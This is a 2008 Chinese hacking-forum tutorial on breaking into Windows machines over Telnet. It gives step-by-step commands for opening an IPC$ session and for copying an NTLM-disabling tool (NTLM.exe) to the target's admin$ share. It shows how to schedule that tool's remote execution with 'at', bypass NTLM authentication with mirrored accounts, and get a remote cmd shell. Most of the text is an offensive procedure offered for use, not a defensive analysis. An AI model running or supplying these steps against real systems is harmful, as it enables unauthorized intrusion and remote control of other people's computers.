Telnet入侵指令分析

2008/10/5 来源:www.arpun.com 作者:小白

简单介绍关于NTLM验证

    由于Telnet功能太强大, 而且也是入侵者使用最频繁的登录手段之一, 因此微软公司为Telnet添加了身份验证, 称为NTLM验证, 它要求Telnet终端除了需要有Telnet服务主机的用户名和密码外, 还需要满足NTLM验证关系。 NTLM验证大大增强了Telnet主机的安全性, 就像一只拦路虎把很多入侵者拒之门外。 (关于NTLM我有写一个专门帖子。 。 各位可以去看看)

1.使用telnet连接主机

指令格式(cmd):telnet 192.168.0.0 连接端口号

如果要断开。 。 就是exit。 。

这个本人写了一个很详细的帖子发表在黑盟“远程开启telnet“

2.典型telnet入侵攻略

第一步:建立IPC$连接(本人也写了很详细关于IPC$连接的方法),

第二步:开启远程telnet连接, 首先在cmd(确定此时的根目录是目标的)输入指令。 。 service  开启service项目。 。 。 仔细找找。 。 。 就有Telnet服务项。 。 。 。 把它打开。 。 。

第三步:取消IPC$连接:net use 192.168.0.0 /del

第四步:去掉NTLM验证, 如果没有去除目标上的NTLM验证, 在登录目标的电脑的时候就会失败。

其实方法有很多种。 。 。 本人就介绍我最常用的一个。 。 也是最简单的方法吧。 。 。

首先, 在本地计算机上建立一个与远程主机上相同的账号和密码。

指令:net localgroup alpha /add                    不过确定对方的账号也是alpha。 。 因为要相同的。 。

第二步:通过“开始”→“程序”→“附件”找到“命令提示符”, 使用鼠标右键单击“命令提示符”, 然后选择“属性”。

在“以其他用户身份运行(U)”前面挑上挑。 。 然后点。 。 “确定”接着。 。 仍然按照上述路径找到“命令提示符”(cmd)。 。 之后用左健打开它。 。 。 。

之后写上用户名和密码。 。 。 alpha的

然后点确定。 。 。 得到cmd shell框。 。 。

之后输入我们的指令:telnet 192.168.0.0

现在就会显示一个更新后的cmd shell。 。 这个shell就192.168.0.0上的。 。 。

其实去掉NTLM验证的方法很多。 。 。 我再介绍给大家一个方法。 。 。

这个方法就是超级菜鸟话。 。 。 因为我们需要用到一个工具。 。 NTLM.exe。 。 这个工具就像是3389.exe一样。 。 只要把3389.exe传到一台机器上去执行。 。 那台机器上的3389端口就会自动打开。 。 。

NTLM.exe的运作概念和3389.exe是一样的。 。 。 我们需要做的就是把我们的NTLM.exe传到192.168.0.0这个机器上。 。 。

首先:开cmd。 。

然后输入指令:net use \\192.168.0.0\ipc$*""\user:administrator

之后再输入指令:copy c:\NTLM.exe \\192.168.0.0\admin$

解释一下:\admin$是使用192.168.0.0主机上的admin用户共享权限。 。 。 。

然后再输入察看时间指令:net time \\192.168.0.0

我们假如对方的时间是2007/9/21 下午3点21分。 。 。

之后再输入执行指令:at \\192.168.0.0 15:22 NTLM.exe

解释一下:15:22是24小时至的下午3点22分。 。 。 cmd shell输入指令时一定要写24小时的。 。

之后当按回车确定后得到:新增加一项作业    或者是什么指令成功完成的提示字后。 。 。 等待1分钟。 。 。 让cmd完成我们的shell command。 。 。

之后我们再输入指令:telnet 192.168.0.0

Ok.........................大功告成。 。 。 。

如果要恢复NTLM验证。 。 。 我们要用到一个shell工具:resumetelnet.exe

resumetelnet.exe使用的方法是这样的。 。 。

命令格式:ResumeTelnet.exe \\\\server name password

其中server name是主机域名或者是IP都可以。 。 。 我们就写192.168.0.0

password当然就是密码了。 。 。 。

回车确定。 。 。 。 。 。 。 。 。 。 。 。 。 。 。 。 。 。 当显示the command completed successfully后。 。 一切完成。 。 。 。 。 。 。 。 。 。 。 。

网友评论
评论(...
全部评论